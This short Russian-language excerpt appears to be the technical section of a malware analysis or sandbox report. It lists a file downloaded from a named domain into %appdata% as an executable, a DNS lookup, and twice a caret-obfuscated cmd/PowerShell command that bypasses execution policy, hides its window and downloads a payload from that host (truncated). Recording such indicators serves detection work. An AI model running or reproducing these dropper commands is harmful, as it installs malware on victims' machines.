Техническая информация
- http://rootaleyz.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^wEr^shEL^l^.eXE -^exeCutiONp^olicY byP^a^SS^ ^-nop^RoF^I^l^e^ ^-wiNDOw^S^TyLe ^hI^DDEN (n^Ew-^obJeCt Sy^sT^EM.^ne^t.^wEBCLIen^T).dOwNLOADF^IL^E('http://rootaleyz.top/...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /c "p^o^wEr^shEL^l^.eXE -^exeCutiONp^olicY byP^a^SS^ ^-nop^RoF^I^l^e^ ^-wiNDOw^S^TyLe ^hI^DDEN (n^Ew-^obJeCt Sy^sT^EM.^ne^t.^wEBCLIen^T).dOwNLOADF^IL^E('http://rootaleyz.top/...' (со скрытым окном)